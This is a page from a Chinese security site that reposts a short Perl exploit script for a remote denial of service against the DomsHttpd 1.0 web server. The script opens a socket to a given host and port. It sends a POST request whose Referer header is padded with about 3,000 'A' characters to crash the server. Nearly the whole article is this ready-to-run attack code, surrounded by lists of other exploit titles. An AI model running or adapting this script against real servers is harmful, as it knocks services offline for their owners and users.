首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DomsHttpd <= 1.0 Remote Denial Of Service Exploit
来源:pereira@secbiz.de 作者:Pereira 发布时间:2012-07-17  

#!/usr/bin/perl

# DomsHttpd 1.0 <= Remote Denial Of Service Exploit

# Credit: Jean Pascal Pereira <pereira@secbiz.de>

# Usage: domshttpd.pl [host] [port]

use strict;
use warnings;
use IO::Socket;

my $host = shift || "localhost";
my $port = shift || 88;

my $sock = IO::Socket::INET->new( Proto => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => $port
);


my $junk = "A"x3047;

print $sock "POST / HTTP/1.1\r\nHost: ".$host."\r\nConnection: close\r\nUser-Agent: Mozilla\r\nReferer: http://".$host."/".$junk."\r\n\r\n";

sleep 4;

close($sock);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ALLMediaServer 0.8 Buffer Over
·Intel SYSRET FreeBSD Privilege
·Mc Full Audio Converter 1.3.0
·Google Chrome 19 metro_driver.
·Kool Media Converter 2.7.0 Den
·WM Downloader (aslr bypass) st
·Shadow Stream Recorder (aslr b
·beSTORM ActiveX (WinGraphviz.d
·Arora Browser 0.10.2 Denial Of
·Telnet Ftp Server <= Memory Co
·Setuid Nmap Exploit
·Intel Core2Duo cpu cache contr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved